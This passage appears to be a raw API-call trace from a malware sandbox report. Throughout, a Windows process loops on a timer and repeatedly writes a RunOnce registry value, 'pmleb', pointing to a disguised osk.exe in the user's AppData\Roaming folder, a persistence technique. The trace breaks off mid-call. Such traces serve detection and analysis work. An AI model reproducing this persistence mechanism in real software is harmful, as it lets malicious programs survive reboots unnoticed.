DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.244] KillTimer (hWnd=0x20280, uIDEvent=0x219e) returned 1 [0085.244] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.245] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.245] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.245] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.245] RegCloseKey (hKey=0x280) returned 0x0 [0085.246] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.246] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.246] SetTimer (hWnd=0x20280, nIDEvent=0x219f, uElapse=0xa, lpTimerFunc=0x0) returned 0x219f [0085.246] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.259] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.259] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.260] KillTimer (hWnd=0x20280, uIDEvent=0x219f) returned 1 [0085.260] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.260] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.261] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.261] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.261] RegCloseKey (hKey=0x280) returned 0x0 [0085.261] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.261] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.261] SetTimer (hWnd=0x20280, nIDEvent=0x21a0, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a0 [0085.262] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.276] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.276] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.277] KillTimer (hWnd=0x20280, uIDEvent=0x21a0) returned 1 [0085.277] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.277] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.277] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.278] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.278] RegCloseKey (hKey=0x280) returned 0x0 [0085.278] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.278] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.278] SetTimer (hWnd=0x20280, nIDEvent=0x21a1, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a1 [0085.278] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.383] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.383] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.384] KillTimer (hWnd=0x20280, uIDEvent=0x21a1) returned 1 [0085.384] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.384] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.384] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.385] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.385] RegCloseKey (hKey=0x280) returned 0x0 [0085.385] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.385] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.385] SetTimer (hWnd=0x20280, nIDEvent=0x21a2, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a2 [0085.385] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.400] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.400] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.400] KillTimer (hWnd=0x20280, uIDEvent=0x21a2) returned 1 [0085.400] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.401] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.401] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.401] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.401] RegCloseKey (hKey=0x280) returned 0x0 [0085.401] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.401] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.401] SetTimer (hWnd=0x20280, nIDEvent=0x21a3, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a3 [0085.401] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.416] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.416] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.416] KillTimer (hWnd=0x20280, uIDEvent=0x21a3) returned 1 [0085.416] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.416] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.416] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.417] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.417] RegCloseKey (hKey=0x280) returned 0x0 [0085.417] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.417] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.417] SetTimer (hWnd=0x20280, nIDEvent=0x21a4, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a4 [0085.417] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.431] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.431] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.431] KillTimer (hWnd=0x20280, uIDEvent=0x21a4) returned 1 [0085.431] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.432] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.432] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.432] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.432] RegCloseKey (hKey=0x280) returned 0x0 [0085.432] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.432] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.432] SetTimer (hWnd=0x20280, nIDEvent=0x21a5, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a5 [0085.432] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.447] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.447] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.447] KillTimer (hWnd=0x20280, uIDEvent=0x21a5) returned 1 [0085.447] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.447] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.447] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.448] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.448] RegCloseKey (hKey=0x280) returned 0x0 [0085.448] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.448] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.448] SetTimer (hWnd=0x20280, nIDEvent=0x21a6, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a6 [0085.448] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.462] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.462] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.462] KillTimer (hWnd=0x20280, uIDEvent=0x21a6) returned 1 [0085.463] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.463] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.463] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.463] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.463] RegCloseKey (hKey=0x280) returned 0x0 [0085.463] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.464] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.464] SetTimer (hWnd=0x20280, nIDEvent=0x21a7, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a7 [0085.464] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.478] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.478] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.478] KillTimer (hWnd=0x20280, uIDEvent=0x21a7) returned 1 [0085.478] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.478] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.479] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.479] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.479] RegCloseKey (hKey=0x280) returned 0x0 [0085.479] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.479] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.479] SetTimer (hWnd=0x20280, nIDEvent=0x21a8, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a8 [0085.479] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.494] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.494] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.494] KillTimer (hWnd=0x20280, uIDEvent=0x21a8) returned 1 [0085.494] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.495] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.495] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.495] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.495] RegCloseKey (hKey=0x280) returned 0x0 [0085.496] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.496] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.496] SetTimer (hWnd=0x20280, nIDEvent=0x21a9, uElapse=0xa, lpTimerFunc=0x0) returned 0x21a9 [0085.496] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.509] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.509] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.509] KillTimer (hWnd=0x20280, uIDEvent=0x21a9) returned 1 [0085.510] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.510] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.510] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.510] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.510] RegCloseKey (hKey=0x280) returned 0x0 [0085.510] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.510] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.510] SetTimer (hWnd=0x20280, nIDEvent=0x21aa, uElapse=0xa, lpTimerFunc=0x0) returned 0x21aa [0085.511] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.528] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.528] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.528] KillTimer (hWnd=0x20280, uIDEvent=0x21aa) returned 1 [0085.528] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.528] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.528] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.529] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.529] RegCloseKey (hKey=0x280) returned 0x0 [0085.529] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.529] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.529] SetTimer (hWnd=0x20280, nIDEvent=0x21ab, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ab [0085.529] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.541] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.541] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.541] KillTimer (hWnd=0x20280, uIDEvent=0x21ab) returned 1 [0085.541] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.542] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.542] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.542] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.542] RegCloseKey (hKey=0x280) returned 0x0 [0085.542] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.543] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.543] SetTimer (hWnd=0x20280, nIDEvent=0x21ac, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ac [0085.543] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.556] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.556] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.556] KillTimer (hWnd=0x20280, uIDEvent=0x21ac) returned 1 [0085.556] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.557] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.557] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.557] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.557] RegCloseKey (hKey=0x280) returned 0x0 [0085.557] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.558] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.558] SetTimer (hWnd=0x20280, nIDEvent=0x21ad, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ad [0085.558] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.571] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.572] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.572] KillTimer (hWnd=0x20280, uIDEvent=0x21ad) returned 1 [0085.572] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.572] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.573] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.573] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.573] RegCloseKey (hKey=0x280) returned 0x0 [0085.573] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.573] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.573] SetTimer (hWnd=0x20280, nIDEvent=0x21ae, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ae [0085.573] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.587] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.587] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.587] KillTimer (hWnd=0x20280, uIDEvent=0x21ae) returned 1 [0085.588] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.588] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.588] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.588] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.589] RegCloseKey (hKey=0x280) returned 0x0 [0085.589] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.589] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.589] SetTimer (hWnd=0x20280, nIDEvent=0x21af, uElapse=0xa, lpTimerFunc=0x0) returned 0x21af [0085.589] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.603] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.603] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.604] KillTimer (hWnd=0x20280, uIDEvent=0x21af) returned 1 [0085.604] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.604] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.605] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.605] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.605] RegCloseKey (hKey=0x280) returned 0x0 [0085.605] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.605] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.605] SetTimer (hWnd=0x20280, nIDEvent=0x21b0, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b0 [0085.605] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.618] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.618] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.619] KillTimer (hWnd=0x20280, uIDEvent=0x21b0) returned 1 [0085.619] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.619] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.619] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.620] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 